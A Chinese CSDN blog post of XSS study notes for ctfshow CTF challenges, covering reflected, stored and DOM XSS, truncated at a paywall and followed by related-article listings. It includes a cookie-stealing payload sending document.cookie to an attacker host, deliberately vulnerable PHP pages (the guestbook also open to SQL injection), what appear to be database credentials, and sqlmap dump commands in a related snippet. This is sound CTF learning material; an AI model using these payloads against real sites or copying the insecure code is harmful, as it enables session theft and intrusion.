【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)

已于 2024-06-07 12:06:27 修改
阅读量5.4k 收藏 46
点赞数 25
分类专栏: ctf-web 文章标签: 前端 xss 学习 web安全 安全 网络安全 笔记
于 2024-06-07 11:58:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jayq1/article/details/139523410
版权

XSS 跨站脚本攻击

文章目录

What is XSS?

跨站脚本攻击(Cross site Scripting):将任意Javascript代码插入到其他web用户页面里执行达到攻击目的的漏洞

与其他漏洞的区别:其他漏洞是为了攻击网站的服务器和数据库,但是该漏洞是去攻击其他用户。

How to lead XSS?

攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用户,当一个Web程序的用户输入点没有进行校验和编码,将很容易导致XSS漏洞

自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击

Where is the XSS?

  1. 数据交互的地方

get post cookies headers

反馈与浏览

富文本编辑器

各类标签插入和定义

  1. 数据输出的地方

用户资料

关键词标签说明

文件上传

一般在ctf中会存在bot机器人 就是明确说明 给一个网址 机器人去访问

Cookie

为了辨别用户身份而存储在客户端上的数据

获取Cookie:

浏览器端(客户端):document.cookie

服务器端(php):$_COOKIE

How to use XSS?

  • 标签闭合逃逸

image-20230830185227975

在界面审查元素我们可以发现输出的结果在p标签内 所以当我们搜索时把p标签闭合 就可以在网页插入其他代码

攻击逻辑:请求带出

在script标签中执行:

window.open  #打开新窗口
window.location.href  #当前界面跳转
location.href

window.open('http://your_ip:port/?cookie=' + btoa(document.cookie))
#btoa实现base64编码
#开启服务器监听 然后将构造的exp给机器人进行访问 从而获得更高权限用户的cookie

反射型XSS

输入什么界面返回什么

我们成功在服务器上部署了一个存在xss漏洞的代码:

<?php
$input = $_GET['input'];

if(isset($input)){
   
    echo("<h1>".$input."<h1>");    
}
else{
   
    highlight_file(__FILE__);
}
?>

然后传参,其中参数中包含恶意代码:

http://154.8.183.198/attack/xsstest.php?input=<script>alert("111")</script>

image-20230919114645000

成功弹窗

存储型XSS

存储在服务器中的数据库里面

服务器搭建一波:(不得不提 有自己的服务器太爽了吧哈哈哈 好多东西都立马清楚了 知道怎么实现的了)

首先在服务器创建mysql数据库用来存储信息

库名:xss

表名:message

字段名: id username message varchar(255)

其中需要把id 设置为主键 并且自动增加不为空

当时这个在图形化界面中没有找到怎么设置 就单纯创建好主键后执行了sql语句

ALTER TABLE `message` CHANGE `id` `id` INT(11) NOT NULL AUTO_INCREMENT

image-20230919122424588

到此基本的数据库搭建完成

下面进行基础网页的搭建

<meta charset="utf-8">
<?php
/*数据库信息配置*/
$host = "localhost"; //数据库地址
$port = "3306"; //数据库端口
$user = "ka1mi2CL"; //数据库用户名
$pwd = "gY8mgYWxRAdN"; //数据库密码
$dbname = "xss"; //数据库名
$conn = new mysqli($host,$user,$pwd,$dbname,$port);
?>

<!-- 前端用户输入表单 -->
<h1>留言板的存储型XSS</h1>
<form  method="post">
<input type="text" name="username" placeholder="姓名">
<input type="text" name="message" placeholder="请输入您的留言">
<input type="submit">
</form>

<?php
    /*直接将留言插入到数据库中*/
    $username=$_POST['username'];
    $message=$_POST['message'];
    if($username and $message)
    {
        $sql="INSERT INTO `message`(`username`, `message`) VALUES ('{$username}','{$message}')";
        if ($conn->query($sql) === TRUE) {
            echo "留言成功"."<br>";
        } else {
            echo "Error: " . $sql . "<br>" . $conn->error;
        }
    }else{
        echo "请填写完整信息"."<br>";
    }

    /*查询数据库中的留言信息*/
    $sql = "SELECT username, message FROM message";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            echo "用户名:" . $row["username"]. "留言内容:" . $row["message"]."<br>";
        }
    } else {
        echo "暂无留言";
    }
?>

image-20230919123115852

添加

Dom-Based XSS

最后再来搭建一下基于dom的xss漏洞 其中dom就是指document html中的语法

首先这个东西就是因为代码写的没有验证用户的输入导致

全部发生在客户端 感觉和反射型有些类似哈

具体成因仿照咱们搭建的服务器:

最低0.47元/天 解锁文章
网络安全系列&网安学习系列:愿安全人不再踩坑,网络安全学习经验
weixin_54626591的博客
10-23 225
安全人不再踩坑,网络安全学习经验
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)
0xSec
03-14 2058
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
CTFshow刷题日记-WEB-XSS(web316-333)
Love&Share
09-29 5709
web316-无过滤反射型XSS 大概就是要生成Xss代码链接,获取管理员cookie,后台bot每隔一段时间自动点击链接 方法一:xss平台 利用xss平台生成链接 xss平台 https://xsshs.cn/,https://xss.pt/,http://xsscom.com 在xss平台创建项目,选择默认模块即可,复制生成的xss代码,复制到题目留言框中 刷新下页面,然后在平台查看项目 方法二:自动接收脚本 在自己的服务器上放一个PHP代码 # a.php <?php $cookie
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1321
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
ctfshow-xxs-316-333-wp
最新发布
2301_80915592的博客
03-15 837
316.反射型 XSS-326都是反射型)js恶意代码是存在于某个参数中,通过url后缀进行get传入,当其他用户点进这个被精心构造的url链接时,恶意代码就会被解析,从而盗取用户信息。来看题,先简单测试一下是xxs直接注入(代码意思是浏览器解析这段代码时,会弹出一个警告对话框,显示当前网页的所有 Cookie 信息)弹出flag=你不是管理员。显然,由于我们不是管理员,所以cookie参数是不正确的。
CTF自学-XSS(1)
m0_61926696的博客
09-30 1899
XSS(Cross Site Scripting,防止与CSS混淆)跨站脚本攻击,即向web页面插入恶意脚本代码,与SQL注入相似,不过SQL注入的位置是数据库查询语句,XSS注入的是网页脚本。
CTF-Web-XSS
beihai2013
02-03 861
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
ctfhub——web——xss
weixin_43906500的博客
05-14 367
题目如下,为反射型xss
CTFhub之xss漏洞
weixin_46954909的博客
05-15 1066
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
CTFSHOW XSS漏洞
qq_61553520的博客
04-20 449
这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-333
《从0到1:CTFer成长之路》XSS漏洞
weixin_43072923的博客
12-17 3147
《从0到1:CTFer成长之路》XSS漏洞
xss复习总结及ctfshow做题总结xss
m0_74402888的博客
07-15 1029
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储型XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
CTF-Web】XXE学习笔记ctfshow例题)
jayq1的博客
05-29 2215
XXE学习笔记
CTF-Web】文件上传漏洞学习笔记ctfshow题目
m0_74825746的博客
12-11 1243
再上传一个png 改后缀为php 好!寄可以看到msg没有正常显示位置 上传失败所以我们使用配置文件去解析一下,配置文件有两个 下面分别介绍一下Reference1.user.ini在nginx或者Apache服务中都可以使用利用条件:open_basedir没有被限制利用原理:使用该配置文件可以让所有php文件自动包含某个文件: 在加载打开的php文件的第一行代码之后加载配置指定的php文件: 在加载打开的php文件的第一行代码之前加载配置指定的php文件上传一句话木马图片上传配置文件。
web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2898
XSS-pikachu
CTF 中的 XSS 攻击:原理、技巧与实战案例
weixin_62428445的博客
03-04 1058
XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码,使得这些代码在其他用户的浏览器中执行。通过这种方式,攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话,甚至对用户进行钓鱼攻击。
CTF-web 第六部分 验证码类和初步XSS知识
iamsongyu的博客
10-17 3083
在登陆中通常我们需要验证码,但有些时候在设计的时候会存在一些漏洞。  1)一次验证     在验证中 随意填写账户密码 验证码正确填写 username=admin&amp;pwd=1234&amp;vcode=28ps&amp;submit=submit pwd error     第二次重复提交显示的是 pwd error 说明对验证有漏洞     已知密码为纯四位,我们使用burp ...
CTFHub】XSS漏洞_反射型
Mitchell_Donovan的博客
04-20 1120
CTFHub_反射型XSS 原题链接 key:反射型XSS的注入与利用 ①原题界面如下???? 简单地尝试一下有无反射型XSS漏洞,在第一个框内提交以下XSS弹窗语句???? <script>alert(1)</script> 发现成功弹窗,说明存在XSS漏洞 ②登陆平台XSSplatform,创建新项目???? 进行相关配置???? ③查看项目代码???? 这都不重要,在底部找到使用方法???? ④把其中一条攻击代码复制下
CTFXSS漏洞
博客
07-25 3733
练习平台 XSS Challenges (by yamagata21) - Stage #1 http://xss-quiz.int21h.jp/ alert(1) https://xss.haozi.me/#/0x00 alert(1) to win https://alf.nu/alert1
ctfshow sql
08-03
回答: 要在ctfshow数据库中执行SQL查询和获取数据,可以使用sqlmap工具。首先,使用以下命令查询ctfshow_user表的列名:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns。[1]接下来,使用以下命令来查询和获取ctfshow_user表中的数据:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[2]如果你只想直接获取最后一步的数据,可以使用以下命令:python sqlmap.py -u "http://b794446b-7f11-4600-beba-3de5961369b7.challenge.ctf.show/api/" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[3]这些命令将帮助你在ctfshow数据库中执行SQL查询和获取数据。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值